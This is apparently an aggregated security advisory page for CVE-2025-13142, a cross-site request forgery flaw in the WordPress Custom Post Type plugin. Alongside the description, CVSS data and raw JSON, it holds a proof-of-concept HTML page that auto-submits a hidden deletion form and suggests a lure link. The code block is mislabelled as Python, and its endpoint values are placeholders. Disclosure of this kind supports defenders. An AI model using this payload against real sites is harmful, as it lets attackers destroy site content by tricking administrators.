Security Vulnerability Report
中文
CVE-2025-13142 CVSS 4.3 MEDIUM

CVE-2025-13142

Published: 2025-11-21 08:15:55
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Custom Post Type plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on the custom post type deletion functionality. This makes it possible for unauthenticated attackers to delete custom post types via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Custom Post Type插件 <= 1.0(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-13142 --> <!-- Target: WordPress Custom Post Type plugin <= 1.0 --> <!-- Attack: Delete custom post types without authentication --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-13142</title> </head> <body> <h1>Custom Post Type Deletion CSRF PoC</h1> <p>Click the button below to trigger the deletion request.</p> <!-- Auto-submit form to delete custom post type --> <form id="csrfForm" action="http://target-site/wp-admin/admin.php" method="POST" style="display:none;"> <!-- Change 'page' value according to plugin's actual delete endpoint --> <input type="hidden" name="page" value="custom-post-type-delete"> <input type="hidden" name="action" value="delete"> <input type="hidden" name="post_type" value="your_custom_post_type"> <input type="hidden" name="_wpnonce" value=""> <!-- Nonce validation is missing, so this can be empty --> </form> <script> // Auto-submit when page loads document.getElementById('csrfForm').submit(); </script> <button onclick="document.getElementById('csrfForm').submit();">Click Me</button> </body> </html> <!-- Alternative: Direct link-based attack --> <!-- <a href="http://target-site/wp-admin/admin.php?page=custom-post-type-delete&action=delete&post_type=your_custom_post_type">Click here for prizes!</a> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13142", "sourceIdentifier": "[email protected]", "published": "2025-11-21T08:15:55.097", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Custom Post Type plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on the custom post type deletion functionality. This makes it possible for unauthenticated attackers to delete custom post types via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/custom-post-type/tags/1.0/cupta-dmin.php#L29", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/48fefbd5-d872-4f47-8696-d73fbc9133ed?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.